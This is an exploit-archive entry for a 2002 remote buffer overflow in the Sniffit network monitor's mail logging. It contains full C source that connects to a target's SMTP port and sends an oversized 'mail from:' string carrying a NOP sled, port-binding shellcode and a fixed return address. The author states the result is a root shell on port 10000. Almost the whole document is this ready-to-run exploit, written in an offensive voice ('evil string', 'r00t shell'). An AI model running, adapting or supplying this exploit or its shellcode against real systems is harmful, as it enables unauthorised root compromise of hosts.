Brecht Claerhout Sniffit 0.3.6 HIP0.3.7 Beta - Mail Logging Buffer Overflow (3)

2002-01-18T00:00:00
ID EXPLOITPACK:CDB81F7EBD7BAA4A4581F46FFEE0D08B
Type exploitpack
Reporter g463
Modified 2002-01-18T00:00:00

Description

Brecht Claerhout Sniffit 0.3.6 HIP0.3.7 Beta - Mail Logging Buffer Overflow (3)

                                        
                                            // source: https://www.securityfocus.com/bid/1158/info
 
Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.
 
Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.
 
There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

/*

   Remote overflow in sniffit.0.3.7.beta
   tested on slackware 7.1
   found/coded by g463
   -18th january 2002-

   The vulnerability is triggered when the option -L is
called from the
   command line with 'normmail'
   ie : ./sniffit -c ./sample_config_file -L normmail
   It calls a piece of code where the buffer is
unchecked

       //From sniffit.0.3.7.beta/sn_logfile.c
       void print_mail (char *conn, char *msg)
       {
       char line[250];
       sprintf(line,"%s: mail [%s]",conn,msg);
       print_logline (line);
       }

       -  In a normal situation, it could be easier to fill line
[250] with our
       shellcode,  but  since  this buffer  gets filter  with
some kind of
       strlower() function  (thus our shellcode/return
adress too), i rely
       on an unfiltered buffer with the same data so we
can point eip back
       at that place with clean, unmodified shellcode :D


All my brothers (alphabetical order) : Erebus, Jinx,
mtadbf, nitr0gen, Slink[e]
+ some others i forget :p

*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <error.h>
#include <string.h>

#define SMTP_PORT 25
#define MAX_LINE 256
#define BUFLEN 252

//define this to your ip
#define MY_IP "192.168.0.1"

//Value for overwriting eip
//should be the adress of the data buffer + some
couple of garbage bytes
#define RETADR 0x08059408

//Port binding shellcode, binds on port 10000
//taken from bighawk@warfare.com
char shellcode[] =
   "\x31\xc0"			// xor     eax,
eax
   "\x31\xdb"			// xor     ebx,
ebx
   "\x89\xe5"			// mov     ebp,
esp
   "\x99"			// cdq
   "\xb0\x66"			// mov     al,
102
   "\x89\x5d\xfc"		// mov     [ebp-4], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf8"		// mov     [ebp-8], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf4"		// mov     [ebp-12], ebx
   "\x4b"			// dec     ebx
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\x45\xf4"		// mov     [ebp-12], eax
   "\x43"			// inc     ebx
   "\x66\x89\x5d\xec"		// mov     [ebp-
20], bx
   "\x66\xc7\x45\xee\x27\x10"	// mov     [ebp-18], word
4135
   "\x89\x55\xf0"		// mov     [ebp-16], edx
   "\x8d\x45\xec"		// lea     eax, [ebp-20]
   "\x89\x45\xf8"		// mov     [ebp-8], eax
   "\xc6\x45\xfc\x10"		// mov     [ebp-4], byte
16
   "\xb2\x66"			// mov     dl,
102
   "\x89\xd0"			// mov     eax,
ed
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\xd0"			// mov     eax,
edx
   "\xb3\x04"			// mov     bl, 4
   "\xcd\x80"			// int     80h
   "\x43"			// inc     ebx
   "\x89\xd0"			// mov     eax,
edx
   "\x99"			// cdq
   "\x89\x55\xf8"		// mov     [ebp-8], edx
   "\x89\x55\xfc"		// mov     [ebp-4], edx
   "\xcd\x80"			// int     80h
   "\x31\xc9"			// xor     ecx,
ecx
   "\x89\xc3"			// mov     ebx,
eax
   "\xb1\x03"			// mov     cl, 3
   "\xb0\x3f"			// mov     al,
63
   "\x49"			// dec     ecx
   "\xcd\x80"			// int     80h
   "\x41"			// inc     ecx
   "\xe2\xf8"			// loop    -7
   "\x52"			// push    edx
   "\x68\x6e\x2f\x73\x68"	// push    dword
68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword
69622f2fh
   "\x89\xe3"			// mov     ebx,
esp
   "\x52"			// push    edx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx,
esp
   "\xb0\x0b"			// mov     al,
11
   "\xcd\x80";			// int     80h


int usage (char *);
int calculate_conn_lenght (struct sockaddr_in, struct
sockaddr_in);

int
main (int argc, char *argv[])
{

   struct sockaddr_in stServer, stClient;
   char *ptHost;
   unsigned long int iHost;
   int iSockfd, iLenght, iAlign = 0;
   char sBuffer[MAX_LINE];
   char sString[300];
   int i;

   if (argc != 2) usage (argv[0]);

   ptHost = argv[1];
   if ( (iHost = inet_addr (argv[1])) == INADDR_NONE)
{

      printf ("Invalid host or host is 255.255.255.255\n");
      exit (-1);

   }

   //Fill the server struct
   memset (&stServer, 0, sizeof (struct sockaddr_in));
   stServer.sin_family      = AF_INET;
   stServer.sin_port        = htons (SMTP_PORT);
   stServer.sin_addr.s_addr = iHost;

   if ( (iSockfd = socket (AF_INET, SOCK_STREAM,
0)) == -1) {

      printf ("Error opening socket\n");
      exit (-1);

   }

   // Fill the client struct, mainly used to calculate the
right align for RET addy
   memset (&stClient, 0, sizeof (struct sockaddr_in));
   stClient.sin_family      = AF_INET;
   stClient.sin_port        = htons (0);
   stClient.sin_addr.s_addr = inet_addr (MY_IP);

   if ( (bind (iSockfd, (struct sockaddr *) &stClient,
sizeof (stClient))) == -1 ) {

      perror ("Cant bind socket");
      exit (-1);

   }

   iAlign = calculate_conn_lenght (stClient, stServer);
   i = BUFLEN - iAlign + 4;

   if ( (connect (iSockfd, (struct sockaddr *)
&stServer, sizeof (stServer))) != 0) {

      perror ("Cant connect");
      exit (-1);

   }
   else printf ("Connected to host %s on port %d\n\n",
ptHost, SMTP_PORT);

   // Recevons la banni^�re du serveur smtp
   if ( (iLenght = recv (iSockfd, sBuffer, MAX_LINE, 0))
== -1) {

      perror ("Cant get server banner");
      exit (-1);

   }
   printf ("%s\n", sBuffer);

   printf ("Building evil string... >:)\n");

   memset (sString, 0x90, sizeof (sString));

   memcpy (sString, "mail from:", strlen ("mail from:"));
   memcpy(sString + i - strlen (shellcode), shellcode,
strlen (shellcode));

   sString[i++] = (RETADR & 0x000000ff);
   sString[i++] = (RETADR & 0x0000ff00) >> 8;
   sString[i++] = (RETADR & 0x00ff0000) >> 16;
   sString[i++] = (RETADR & 0xff000000) >> 24;
   sString[i]   = '\0';

   if ( (send (iSockfd, sString, strlen (sString), 0)) == -
1) {

      perror ("cant send message");
      exit (-1);

   }

   printf ("Evil string sent!\n");
   printf ("Try telneting the host on port 10000 for r00t
shell!\n");

   close (iSockfd);

   return (0);

}

int usage (char *progname)
{

   printf ("%s <ip>\n", progname);
   exit (-1);

}

/*
   function to calculate conn entry lenght
   ie : strlen of ("192.168.0.1.1024-192.168.0.69.25");
   (fuckin dirty but heh it works)
*/
int calculate_conn_lenght (struct sockaddr_in me,
struct sockaddr_in him)
{
   int lenght = 0;
   struct in_addr in;

   in.s_addr = me.sin_addr.s_addr;
   lenght += strlen (inet_ntoa (in));     // 192.168.0.1

   lenght++;                              // .

   lenght += 4;                           // 1220

   lenght ++;                             // .

   in.s_addr = him.sin_addr.s_addr;
   lenght += strlen (inet_ntoa (in));     // 192.168.0.69

   lenght++;                              // .

   lenght += 2;                           // 25

   lenght += strlen (": mail [");

   return (lenght);
}